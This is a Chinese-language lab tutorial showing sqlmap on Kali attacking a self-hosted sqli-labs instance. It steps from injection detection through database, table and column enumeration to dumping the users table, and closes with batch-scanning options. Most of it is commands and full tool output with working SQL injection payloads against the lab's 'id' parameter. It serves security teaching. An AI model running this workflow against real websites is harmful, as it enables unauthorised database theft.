目录
1 前言
由于手动注入、半自动化注入效率较低,对于一些常规的、重复性的可以交由神奇sqlmap来完成。本节课从一个最基础的注入来简单介绍sqlmap工具。
2 实验介绍
2.1 实验平台
- 靶机:CentOS7安装docker,利用docker部署sqli-labs来作为实验平台。具体部署过程可以参考文章《Docker上搭建sqli-labs漏洞环境》。
- 攻击机:Kali系统,本实验利用kali自带的sqlmap来实现自动化注入。
- 靶机与攻击机桥接到同一局域网中。
2.2 实验目标
爆破获取网站后台数据库账号及密码。
3 实验过程
3.1 前戏
- 打开kali系统,点击菜单搜索sql,出现以下界面,点击sqlmap。
- 打开界面如下。
- kali系统上打开浏览器,访问靶机sqli-labs网页。
3.2 判断注入点及注入类型
- 在kali终端,为保险起见输入命令
sudo -i
登录root账户进行实验。 - 在输入命令
sqlmap -u "http://192.168.1.4/Less-1/?id=1"
对目标网站的参数是否能注入进行判断,代码执行过程如下,程序对参数id的数据类型、可行的注入方式进行判断、对四种基本注入手法进行判断与初步执行,对于union联合注入,程序自动判断了回显数据的列数,极大地减少了手动操作。
┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] kali 的密码:
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.1.4/Less-1/?id=1"
___
__H__
___ ___[(]_____ ___ ___ {1.5.11#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:55:45 /2022-02-21/
[09:55:46] [INFO] testing connection to the target URL
[09:55:46] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:55:46] [INFO] testing if the target URL content is stable
[09:55:47] [INFO] target URL content is stable
[09:55:47] [INFO] testing if GET parameter 'id' is dynamic
[09:55:47] [INFO] GET parameter 'id' appears to be dynamic
[09:55:47] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:55:47] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:55:47] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[09:56:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:56:01] [WARNING] reflective value(s) found and filtering out
[09:56:01] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[09:56:01] [INFO] testing 'Generic inline queries'
[09:56:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:56:01] [INFO] GET parameter 'id' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable
[09:56:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:56:01] [WARNING] time-based comparison requires larger statistical model, please wait.............. (done)
[09:56:11] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:56:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:56:11] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:56:11] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:56:11] [INFO] target URL appears to have 3 columns in query
[09:56:11] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 45 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8953=8953 AND 'jWWA'='jWWA
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(2406,CONCAT(0x5c,0x716a7a7071,(SELECT (ELT(2406=2406,1))),0x7176766271)) AND 'sOBt'='sOBt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6435 FROM (SELECT(SLEEP(5)))JDxU) AND 'KsSg'='KsSg
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3927' UNION ALL SELECT NULL,CONCAT(0x716a7a7071,0x556a6644676f6162654467796a634b6a556e6d4b72494a53546f654b5568646f49736f4f59544647,0x7176766271),NULL-- -
---
[09:57:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.1
[09:57:03] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.4'
[*] ending @ 09:57:03 /2022-02-21/
3.3 爆库名
- 使用时机:该命令是确定网站存在注入之后再使用。
- 命令格式:
sqlmap -u 注入点URL --dbs
,获取当前站点后台所有数据库。 - 命令格式:
sqlmap -u 注入点URL --current-db
,获取当前站点所在数据库 - 在上一步确认该网站及参数存在注入后,使用命令sqlmap -u “http://192.168.1.4/Less-1/?id=1” --dbs来爆出该网站后台所有数据库,使用命令sqlmap -u “http://192.168.1.4/Less-1/?id=1” --current-db,通过程序反馈结果,我们知道后台共有5个数据库,当前数据库为’security’。
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.1.4/Less-1/?id=1" --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.5.11#stable}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:52:31 /2022-02-21/
[10:52:31] [INFO] resuming back-end DBMS 'mysql'
[10:52:31] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8953=8953 AND 'jWWA'='jWWA
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(2406,CONCAT(0x5c,0x716a7a7071,(SELECT (ELT(2406=2406,1))),0x7176766271)) AND 'sOBt'='sOBt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6435 FROM (SELECT(SLEEP(5)))JDxU) AND 'KsSg'='KsSg
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3927' UNION ALL SELECT NULL,CONCAT(0x716a7a7071,0x556a6644676f6162654467796a634b6a556e6d4b72494a53546f654b5568646f49736f4f59544647,0x7176766271),NULL-- -
---
[10:52:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.1
[10:52:31] [INFO] fetching database names
[10:52:31] [INFO] retrieved: 'information_schema'
[10:52:31] [INFO] retrieved: 'challenges'
[10:52:31] [INFO] retrieved: 'mysql'
[10:52:31] [INFO] retrieved: 'performance_schema'
[10:52:31] [INFO] retrieved: 'security'
available databases [5]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[10:52:31] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.4'
[*] ending @ 10:52:31 /2022-02-21/
──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.1.4/Less-1/?id=1" --current-db 2 ⨯
___
__H__
___ ___[)]_____ ___ ___ {1.5.11#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:03:20 /2022-02-21/
[11:03:20] [INFO] resuming back-end DBMS 'mysql'
[11:03:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8953=8953 AND 'jWWA'='jWWA
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(2406,CONCAT(0x5c,0x716a7a7071,(SELECT (ELT(2406=2406,1))),0x7176766271)) AND 'sOBt'='sOBt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6435 FROM (SELECT(SLEEP(5)))JDxU) AND 'KsSg'='KsSg
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3927' UNION ALL SELECT NULL,CONCAT(0x716a7a7071,0x556a6644676f6162654467796a634b6a556e6d4b72494a53546f654b5568646f49736f4f59544647,0x7176766271),NULL-- -
---
[11:03:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.1
[11:03:20] [INFO] fetching current database
current database: 'security'
[11:03:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.4'
[*] ending @ 11:03:20 /2022-02-21/
3.4 爆表名
- 使用时机:在查询完数据库之后。
- 功能:查询数据库中的表名,可以指定数据库进行查询,如果没有指定,则会对所有数据库进行查询。
- 命令格式:
sqlmap -u 注入点URL -D 目标数据库 --tables
。 - 在上一步我们确定当前数据库为’security’,使用命令sqlmap -u “http://192.168.1.4/Less-1/?id=1” -D ‘security’ --tables来获取当前数据库下有哪些表。程序运行结果如下,共有4个表,其中表格users是下一步的目标。
──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.1.4/Less-1/?id=1" -D 'security' --tables
___
__H__
___ ___[)]_____ ___ ___ {1.5.11#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:10:44 /2022-02-21/
[11:10:44] [INFO] resuming back-end DBMS 'mysql'
[11:10:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8953=8953 AND 'jWWA'='jWWA
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(2406,CONCAT(0x5c,0x716a7a7071,(SELECT (ELT(2406=2406,1))),0x7176766271)) AND 'sOBt'='sOBt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6435 FROM (SELECT(SLEEP(5)))JDxU) AND 'KsSg'='KsSg
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3927' UNION ALL SELECT NULL,CONCAT(0x716a7a7071,0x556a6644676f6162654467796a634b6a556e6d4b72494a53546f654b5568646f49736f4f59544647,0x7176766271),NULL-- -
---
[11:10:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.1
[11:10:45] [INFO] fetching tables for database: 'security'
[11:10:45] [INFO] retrieved: 'emails'
[11:10:45] [INFO] retrieved: 'referers'
[11:10:45] [INFO] retrieved: 'uagents'
[11:10:45] [INFO] retrieved: 'users'
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
[11:10:45] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.4'
[*] ending @ 11:10:45 /2022-02-21/
3.5 爆字段名
- 使用时机:在查询完表名后。
- 功能:查询表中所有字段名。
- 命令格式:
sqlmap -u 注入点URL -D 目标数据库 -T 目标数据表 --columns
。 - 在获取了数据库名和表名后,我们可以使用命令sqlmap -u “http://192.168.1.4/Less-1/?id=1” -D ‘security’ -T ‘users’ --columns来获取目标表格下有哪些字段。可见共有三个字段,依次是id、username、password。
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.1.4/Less-1/?id=1" -D 'security' -T 'users' --columns
___
__H__
___ ___[,]_____ ___ ___ {1.5.11#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:13:53 /2022-02-21/
[11:13:54] [INFO] resuming back-end DBMS 'mysql'
[11:13:54] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8953=8953 AND 'jWWA'='jWWA
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(2406,CONCAT(0x5c,0x716a7a7071,(SELECT (ELT(2406=2406,1))),0x7176766271)) AND 'sOBt'='sOBt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6435 FROM (SELECT(SLEEP(5)))JDxU) AND 'KsSg'='KsSg
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3927' UNION ALL SELECT NULL,CONCAT(0x716a7a7071,0x556a6644676f6162654467796a634b6a556e6d4b72494a53546f654b5568646f49736f4f59544647,0x7176766271),NULL-- -
---
[11:13:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.1
[11:13:54] [INFO] fetching columns for table 'users' in database 'security'
[11:13:54] [INFO] retrieved: 'id','int(3)'
[11:13:54] [INFO] retrieved: 'username','varchar(20)'
[11:13:54] [INFO] retrieved: 'password','varchar(20)'
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
[11:13:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.4'
[*] ending @ 11:13:54 /2022-02-21/
3.6 爆字段内容
- 使用时机:在查询字段名后。
- 功能:获取字段中具体的数据信息。
- 命令格式:
sqlmap -u 注入点URL -D 目标数据库 -T 目标数据表 -C 目标字段 --dump
。当有多个目标字段需要查询时,使用英文格式逗号隔开。 - 在上述步骤后,我们使用命令sqlmap -u “http://192.168.1.4/Less-1/?id=1” -D ‘security’ -T ‘users’ -C id,username,password --dump获取所有账号及密码,如下,共有13个,整整齐齐。
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.1.4/Less-1/?id=1" -D 'security' -T 'users' -C id,username,password --dump
___
__H__
___ ___["]_____ ___ ___ {1.5.11#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:18:32 /2022-02-21/
[11:18:33] [INFO] resuming back-end DBMS 'mysql'
[11:18:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8953=8953 AND 'jWWA'='jWWA
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(2406,CONCAT(0x5c,0x716a7a7071,(SELECT (ELT(2406=2406,1))),0x7176766271)) AND 'sOBt'='sOBt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6435 FROM (SELECT(SLEEP(5)))JDxU) AND 'KsSg'='KsSg
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3927' UNION ALL SELECT NULL,CONCAT(0x716a7a7071,0x556a6644676f6162654467796a634b6a556e6d4b72494a53546f654b5568646f49736f4f59544647,0x7176766271),NULL-- -
---
[11:18:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.1
[11:18:33] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'security'
[11:18:33] [INFO] retrieved: '1','Dumb','Dumb'
[11:18:33] [INFO] retrieved: '2','I-kill-you','Angelina'
[11:18:33] [INFO] retrieved: '3','p@ssword','Dummy'
[11:18:33] [INFO] retrieved: '4','crappy','secure'
[11:18:33] [INFO] retrieved: '5','stupidity','stupid'
[11:18:33] [INFO] retrieved: '6','genious','superman'
[11:18:33] [INFO] retrieved: '7','mob!le','batman'
[11:18:33] [INFO] retrieved: '8','admin','admin'
[11:18:33] [INFO] retrieved: '9','admin1','admin1'
[11:18:33] [INFO] retrieved: '10','admin2','admin2'
[11:18:33] [INFO] retrieved: '11','admin3','admin3'
[11:18:33] [INFO] retrieved: '12','dumbo','dhakkan'
[11:18:33] [INFO] retrieved: '14','admin4','admin4'
Database: security
Table: users
[13 entries]
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
[11:18:33] [INFO] table 'security.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.4/dump/security/users.csv'
[11:18:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.4'
[*] ending @ 11:18:33 /2022-02-21/
3.7 实验结果
成功获取后台数据库的账号及密码。
3.8 额外地:批量爆破
- SQLMap支持从不同类型的文件中读取请求进行SQL注入探测,这些包含请求的文件可以有BurpSuite截获生成,截获网站请求并生成文件可以参考《BurpSuite截获请求并生成文件》。SQLMap通过设置不同参数来读取不同类型的文件,如:
- -l:从BurpSuite Proxy或WebScarab Proxy中读取http请求日志文件;
- -x:从sitemap.xml站点地图文件中读取目标探测;
- -m:从多行文本格式的文件中读取多个目标,对多个目标进行探测;
- -r:从文本文件中读取http请求作为SQL注入探测的目标;
- -c:从配置文件sqlmap.conf中读取目标探测。
- 按《BurpSuite截获请求并生成文件》步骤生成请求日志文件http_req,存储路径位于桌面上。
- 使用命令
sqlmap -l /home/kali/桌面/http_req
来读取该文件中的请求,以达到批量判断的目的。这里的路径可以右键http_req查看文件属性,要根据自己实际情况而定,不能照抄。运行过程中【1/2】表明是对第几条请求进行注入,共有几条请求。
4 总结
- SQLMAP很自动化,能极大提高工作效率;
- 掌握SQLMAP的常用命令;
- 通过SQLMAP自动化运行过程代码,加深对注入原理的理解。